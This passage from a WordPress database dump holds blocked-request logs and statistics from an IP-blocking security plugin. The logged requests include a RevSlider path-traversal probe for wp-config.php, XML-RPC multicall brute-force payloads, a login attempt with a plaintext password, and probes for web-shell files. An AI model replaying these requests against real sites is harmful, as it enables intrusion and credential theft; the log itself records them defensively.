Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15760,1573584042,'[k•àK?–ÿfzjÅ	P','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15761,1573584044,'›«–nX³¼/3­ÚBZa','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15762,1573584046,'›«–nX³¼/3­ÚBZa','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15763,1573584048,'\n)aCqÊ>ýAÖ…C','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15764,1573584049,'[k•àK?–ÿfzjÅ	P','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15768,1573588251,'pp=à˜Ñ¥ÈKOÎ’9m','','xmlrpc',0,'NL','closed','GET[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36','))õÐ§BEøéŠVlR:£Ç…zú°fX“\nB¶˜!…)È7-K³æ“,Tì§Ö¹½',''),(15767,1573585563,'Òa\'’B=1a%ƒ3]','','admin',0,'NL','blocked','GET[80]://wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','«ÉÓ\'Ñ”þËÇ±L·0š¸ÒÇ1c.jÕà=ÖÙË',''),(15765,1573585558,'/âÙª—lÃuã\'dJ|Ú¢','','admin',0,'DE','blocked','GET[80]:/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','«ÉÓ\'Ñ”þËÇ±L·0š¸ÒÇ1c.jÕà=ÖÙË',''),(15766,1573585558,'÷‡´QO5‰w]¤¸Zø','','admin',0,'GB','blocked','GET[80]:/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','«ÉÓ\'Ñ”þËÇ±L·0š¸ÒÇ1c.jÕà=ÖÙË',''),(15770,1573610064,'H©¯Ø\\¾rN™o‚-CÁ','','xmlrpc',0,'CN','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15769,1573610062,'H©¯Ø\\¾rN™o‚-CÁ','','xmlrpc',0,'CN','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15771,1573621133,'mDQDK\0öÞx=VJÏÅ','','login',0,'SG','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2717.400 QQBrowser/9.6.11133.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15772,1573621134,'mDQDK\0öÞx=VJÏÅ','','login',0,'SG','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2717.400 QQBrowser/9.6.11133.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15773,1573629653,'mDQDK\0öÞx=VJÏÅ','','login',0,'SG','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15774,1573629655,'mDQDK\0öÞx=VJÏÅ','','login',0,'SG','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15777,1573639876,'í·-Š«†ˆ©î¯ÈFª','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.2.1.196 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15778,1573639878,'í·-Š«†ˆ©î¯ÈFª','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.2.1.196 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15718,1573507269,'Tœäüé\\æšþí·„','','admin',0,'US','blocked','GET[80]:/store/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15721,1573512325,'¹f Ç¡Ze™\\³¸~','','admin',0,'DE','blocked','GET[80]:/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','«ÉÓ\'Ñ”þËÇ±L·0š¸ÒÇ1c.jÕà=ÖÙË',''),(15668,1573409863,'ó<©ÇÜØ²f2¡ðužØ','','login',0,'TR','blocked','GET[443]:/wp-signup.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 JuziBrowser','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”¿ºéÍYÄâk¢šj›åÔÌ(t)…GÍgÜ\"„ÓH',''),(15670,1573409871,'ó<©ÇÜØ²f2¡ðužØ','','login',0,'TR','blocked','GET[443]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 JuziBrowser','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”Ž¿AEÒY´ÎÂÜø¤nq?P–séì\'æãüô„Y¹1m&+!Ëž«ï#K\0–',''),(15669,1573409869,'ó<©ÇÜØ²f2¡ðužØ','','login',0,'TR','blocked','GET[443]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 JuziBrowser','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”½Ô—©Û0…–­¨QÂý–XÓåaCpæð3™bv',''),(15645,1573373940,'’)6ŸÚéüœçÌ¡\r','','xmlrpc',0,'US','closed','GET[443]:/xmlrpc.php?rsd','Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16','R&äO­MšÞræ\"‰væ}',''),(15653,1573393939,'Šg¬˜µÃá`ãewž½8\Z','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5193.400 QQBrowser/10.0.1066.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15654,1573393941,'Šg¬˜µÃá`ãewž½8\Z','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5193.400 QQBrowser/10.0.1066.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15655,1573398319,'Ç28žBéÓˆØí7ä±å¤','','login',0,'IL','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15656,1573398321,'Ç28žBéÓˆØí7ä±å¤','','login',0,'IL','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15657,1573398383,'fqó·í3\"\'ÜÌÓÅš4','','admin',0,'UA','blocked','GET[443]:/wp-admin/yt.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36','R&äO­MšÞræ\"‰væ}',''),(15658,1573399830,'iñ|³îï†®A*ªïÐ','','login',0,'UA','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.1.1.840 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15659,1573399843,'a„;ÝF¤Gý\"rp®V‹','','login',0,'UA','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.1.1.840 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15660,1573399845,']ðÖàÁëíéÌ€!;©','','login',0,'IN','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.1.1.840 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15661,1573399849,'ÔÝ~ÚôzŒü‹R.²\Zˆ','','login',0,'IN','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.1.1.840 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15662,1573399852,'Ç†¸gX)óç\\Úœ+ÅÌ','','login',0,'IN','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.1.1.840 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15663,1573399853,'Ð”d(²±‹ûJqx\"Ä','','login',0,'GB','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.1.1.840 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15664,1573399856,'é>}Ž§ÃKvó´ÎÇ»å§q','','login',0,'AM','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.1.1.840 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15665,1573400099,'ür¥¢ÄÚ¼‘¢aÄQ3Ç','','login',0,'UA','blocked','GET[443]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.47','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”¿ºéÍYÄâk¢šj›åÔÌ(t)…GÍgÜ\"„ÓH',''),(15666,1573400102,'ür¥¢ÄÚ¼‘¢aÄQ3Ç','','login',0,'UA','blocked','GET[443]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.47','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”Ž¿AEÒY´ÎÂÜø¤nq?P–séì\'æãüô„Y¹1m&+!Ëž«ï#K\0–',''),(15667,1573401424,'`{·#Dfâ„‘p:','','xmlrpc',0,'CA','closed','POST[80]://xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15814,1573731532,';;ð# Gµe ä£ü?Ža','','login',0,'CN','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.189 Safari/537.36 Vivaldi/1.95.1077.60','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15815,1573739755,';è­ûIÖÃ€&æ)§Ë','','login',0,'US','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','ÍÆn8oÊ)[qoðÅœ³0',''),(15554,1573163495,'¢W„2ñ(c:Ì+Bþ,','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15550,1573159605,'Ô,íMMÕ¬§_ÌVq’–Ù','','xmlrpc',0,'JP','closed','GET[443]:/xmlrpc.php?rsd','Mozilla/5.0 (X11; CrOS x86_64 10452.96.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”¿ºéÍYÄâk¢šj›åÔÌ(t)…GÍgÜ\"„ÓH',''),(15555,1573163497,'¢W„2ñ(c:Ì+Bþ,','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15808,1573722159,'“á¤N`3ÝWYò#‹´A\r','','xmlrpc',0,'VN','closed','POST[80]:/blog/xmlrpc.php','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8','ÍÆn8oÊ)[qoðÅœ³0','<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>narecumsafie55</string></value></param></params></methodCall>'),(15809,1573722159,'“á¤N`3ÝWYò#‹´A\r','','xmlrpc',0,'VN','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8','ÍÆn8oÊ)[qoðÅœ³0','<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>narecumsafie55</string></value></param></params></methodCall>'),(15810,1573725945,'¹5sÆ—‰—)‚Äam8½’¼','','login',0,'US','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','/tC™¢Üû’§Y	¼Ôp>ž%Û¥üò20œL½K–Ïm“#-#gŸ-î¸	ùÏ{ÄD’Ú',''),(15811,1573726563,'€å˜ÃßÕcADZ\'m','','login',0,'SG','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','ÍÆn8oÊ)[qoðÅœ³0',''),(15782,1573639888,'Üæã{–Ý§–xä#©\0î','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.2.1.196 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15783,1573639890,'‡îõÄ¦˜”°àGWúÆ;','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.2.1.196 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15549,1573157313,'YHû—%tö¢iKøôaÄ','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/21.0','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B','');
/*!40000 ALTER TABLE `wpdp_ip_geo_block_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_ip_geo_block_stat`
--

DROP TABLE IF EXISTS `wpdp_ip_geo_block_stat`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_ip_geo_block_stat` (
  `No` tinyint(4) unsigned NOT NULL AUTO_INCREMENT,
  `data` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`No`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_ip_geo_block_stat`
--

LOCK TABLES `wpdp_ip_geo_block_stat` WRITE;
/*!40000 ALTER TABLE `wpdp_ip_geo_block_stat` DISABLE KEYS */;
INSERT INTO `wpdp_ip_geo_block_stat` (`No`, `data`) VALUES (1,'a:7:{s:7:\"blocked\";i:15708;s:7:\"unknown\";i:0;s:4:\"IPv4\";i:15708;s:4:\"IPv6\";i:0;s:9:\"countries\";a:87:{s:2:\"FR\";i:1253;s:2:\"CA\";i:897;s:2:\"US\";i:5391;s:2:\"KR\";i:112;s:2:\"NP\";i:63;s:2:\"AU\";i:147;s:2:\"ZA\";i:61;s:2:\"TR\";i:360;s:2:\"SG\";i:815;s:2:\"IN\";i:586;s:2:\"JP\";i:268;s:2:\"DE\";i:992;s:2:\"GB\";i:711;s:2:\"MY\";i:68;s:2:\"CN\";i:309;s:2:\"ID\";i:284;s:2:\"IT\";i:193;s:2:\"RU\";i:385;s:2:\"VN\";i:603;s:2:\"NL\";i:497;s:2:\"HK\";i:150;s:2:\"AZ\";i:43;s:2:\"BY\";i:13;s:2:\"ES\";i:81;s:2:\"VE\";i:15;s:2:\"RO\";i:100;s:2:\"SE\";i:126;s:2:\"IR\";i:75;s:2:\"UA\";i:134;s:2:\"MK\";i:35;s:2:\"BR\";i:115;s:2:\"PL\";i:171;s:2:\"TW\";i:40;s:2:\"HU\";i:23;s:2:\"TH\";i:81;s:2:\"HN\";i:10;s:2:\"CL\";i:14;s:2:\"LU\";i:39;s:2:\"TN\";i:30;s:2:\"IL\";i:48;s:2:\"IE\";i:19;s:2:\"PT\";i:78;s:2:\"CZ\";i:35;s:2:\"HR\";i:9;s:2:\"PH\";i:3;s:2:\"SK\";i:11;s:2:\"BD\";i:11;s:2:\"EC\";i:3;s:2:\"AR\";i:13;s:2:\"AL\";i:3;s:2:\"BG\";i:5;s:2:\"MZ\";i:14;s:2:\"MW\";i:1;s:2:\"LT\";i:4;s:2:\"PK\";i:9;s:2:\"GR\";i:26;s:2:\"FI\";i:20;s:2:\"MX\";i:11;s:2:\"CH\";i:13;s:2:\"KE\";i:8;s:2:\"MD\";i:5;s:2:\"BZ\";i:9;s:2:\"DK\";i:7;s:2:\"BA\";i:2;s:2:\"CO\";i:6;s:2:\"IS\";i:5;s:2:\"RS\";i:4;s:2:\"LY\";i:2;s:2:\"CY\";i:1;s:2:\"KH\";i:5;s:2:\"AT\";i:1;s:2:\"CR\";i:2;s:2:\"KZ\";i:2;s:2:\"SC\";i:6;s:2:\"EE\";i:4;s:2:\"NO\";i:1;s:2:\"PS\";i:1;s:2:\"MM\";i:1;s:2:\"MV\";i:1;s:2:\"DO\";i:1;s:2:\"UG\";i:1;s:2:\"MA\";i:1;s:2:\"KG\";i:1;s:2:\"NI\";i:1;s:2:\"MN\";i:1;s:2:\"PE\";i:1;s:2:\"AM\";i:2;}s:9:\"providers\";a:3:{s:5:\"Cache\";a:2:{s:5:\"count\";i:10601;s:4:\"time\";d:42.775975704193115234375;}s:8:\"Geolite2\";a:2:{s:5:\"count\";i:5084;s:4:\"time\";d:323.5420448780059814453125;}s:11:\"IP2Location\";a:2:{s:5:\"count\";i:23;s:4:\"time\";d:0.120418071746826171875;}}s:8:\"daystats\";a:30:{i:1571184000;a:2:{s:5:\"login\";i:37;s:6:\"xmlrpc\";i:1;}i:1571270400;a:3:{s:5:\"login\";i:40;s:5:\"admin\";i:13;s:6:\"xmlrpc\";i:3;}i:1571356800;a:3:{s:6:\"xmlrpc\";i:5;s:5:\"login\";i:12;s:5:\"admin\";i:2;}i:1571443200;a:3:{s:5:\"login\";i:62;s:5:\"admin\";i:1;s:6:\"xmlrpc\";i:5;}i:1571529600;a:2:{s:5:\"login\";i:35;s:6:\"xmlrpc\";i:2;}i:1571616000;a:3:{s:5:\"login\";i:60;s:5:\"admin\";i:1;s:6:\"xmlrpc\";i:3;}i:1571702400;a:3:{